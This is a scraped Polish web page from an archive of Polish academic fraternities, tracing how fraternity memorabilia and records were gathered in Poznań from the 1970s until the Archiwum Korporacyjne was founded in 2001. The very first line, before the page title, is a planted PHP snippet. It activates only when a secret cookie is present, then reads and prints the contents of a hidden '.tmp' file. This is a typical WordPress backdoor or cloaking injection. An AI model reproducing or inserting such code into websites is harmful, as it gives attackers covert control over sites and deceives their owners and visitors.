if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

Historia

Większość materialnych śladów po korporacjach akademickich uległa bezpowrotnie zniszczeniu w czasie II wojny światowej. Także okres po jej zakończeniu nie był dla korporacyjnych insygniów, pamiątek i archiwaliów łaskawy.

Zygmunt Kuczyński z K! Filomatia Vilnensis, Warszawa 8 VI 1975 r. Spotkanie Slavitów, w środku prof. Zbysław Popławskich, Kraków 8-9 IX 1979 r.

Przez pierwszą dekadę po wojnie samo podejmowanie prób zebrania ocalałych pamiątek korporacyjnych było ryzykowne. Dopiero po 1956 r., choć i wówczas z oczywistych powodów nie było to łatwe, w ramach poszczególnych nieoficjalnie działających korporacji oraz przez pojedynczych przedwojennych korporantów, zaczęły być podejmowane wysiłki, aby zgromadzić nieliczne i rozproszone ślady po swoich korporacjach. Słowa szczególnego szacunku należą się tym osobom, które podejmowały działania wykraczające poza własne środowisko korporacyjne: Markowi Litwińskiemu z wileńskiej K! Polesia, drowi Zygmuntowi Kuczyńskiemu z wileńskiej K! Filomatia Vilnensis oraz historykowi polskiego ruchu korporacyjnego prof. Zbysławowi Popławskiemu z lwowskiej K! Slavia.

Ks. kan. Arnold Marcinkowski z K! Lechia, Baranowo czerwiec 1975 r.Mec. Sylwester Kubera, Poznań 14 XII 1996 r.

Rzuconą przez Janusza Jabłońskiego z K! Legia myśl, aby podjąć zorganizowane wysiłki na rzecz gromadzenia spuścizny korporacyjnej w Poznaniu podjął w 1974 r. mec. Sylwester Kubera z K! Lechia. Z jego inicjatywy i dzięki wsparciu kustosza Muzeum Archidiecezjalnego w Poznaniu ks. kan. Arnolda Marcinkowskiego z K! Lechia udało się uzyskać zgodę ks. abp. Antoniego Baraniaka na deponowanie w Muzeum pamiątek korporacyjnych. Do połowy lat 80-tych zostały tam zgromadzone między innymi sztandary korporacji Lechia, Legia, Hermesia oraz Gedania Posnaniensis, lechicki mundurek korporacyjny, wydawnictwa korporacyjne i liczne archiwalia.

Drugi Zjazd Filistrów Poznańskich Korporacji Akademickich, Poznań 24 IX 1988 r.

Działania te były kontynuowane w latach 80-tych. Na Drugim Zjeździe Filistrów Poznańskich Korporacji Akademickich dnia 24 IX 1988 r. zebrani członkowie korporacji przyjęli, że:

Naszym głównym celem winno być wykorzystanie wszelkich możliwych źródeł i kontaktów w kierunku pozyskania lub zabezpieczenia wszelkich dokumentów, publikacji, wydawnictw, fotografii itp., jak również przedmiotów stanowiących zewnętrzny wyraz ideowych założeń tj. herbów, czapek, wstęg, sztandarów i innych. Zbieranie pamiątek przeszłości winno służyć do wszechstronnego naświetlenia celów i zasad działalności, formy organizacyjnej, obrzędowości ze szczególnym podkreśleniem funkcji pieśni, roli korporacji w życiu środowisk studenckich itp.

Pierwsze Walne Zgromadzenie Stowarzyszenia Filistrów Poznańskich Korporacji Akademickich, Poznań 10 X 1991 r.

Myśl ta podjęta została w wolnej Polsce. W dniu 10 X 1991 r. na Pierwszym Walnym Zgromadzeniu Stowarzyszenia Filistrów Poznańskich Korporacji Akademickich podjęto decyzję o rozpoczęciu oficjalnych starań zmierzających do stworzeniu Muzeum Korporacyjnego w Poznaniu. W imieniu Stowarzyszenia Zygfryd Kordus z K! Magna-Polonia oraz mec. Sylwester Kubera z K! Lechia prowadzili rozmowy z władzami Uniwersytetu im. Adama Mickiewicza oraz Muzeum Historii Miasta Poznania. Niestety wówczas nie zakończyły się one powodzeniem. Niemniej w tym okresie wspomnianym Zygfrydowi Kordusowi i Sylwestrowi Kuberze, a także Wojciechowi Heppnerowi z K! Magna-Polonia oraz Łukaszowi Jessemu z K! Masovia udało się zgromadzić znaczne zbiory pamiątek korporacyjnych.

W 2000 r. realizacji stworzenia Archiwum Korporacyjnego podjął się Bartłomiej Wróblewski z K! Lechia. Uzyskał on zgodę oraz wsparcie Stowarzyszenia Filistrów Poznańskich Korporacji Akademickich, a także Korporacji Lechia. W początkach 2001 r. powołane zostało oficjalnie Archiwum Korporacyjne (vide Archiwum Korporacyjne). Wkrótce potem rozpoczęła się ogólnopolska akcja zbierania pamiątek korporacyjnych, która spotkała się ze znacznym wsparciem przedwojennych korporantów ze Stowarzyszenia Filistrów Poznańskich Korporacji Akademickich w Poznaniu, Stowarzyszenia Filistrów Polskich Korporacji Akademickich w Warszawie oraz wielu niezrzeszonych członków seniorów polskich korporacji akademickich oraz rodzin zmarłych korporantów (vide Podziękowania).

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 12 IX 2007 r.
Ostatnia zmiana: 29 XI 2010 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }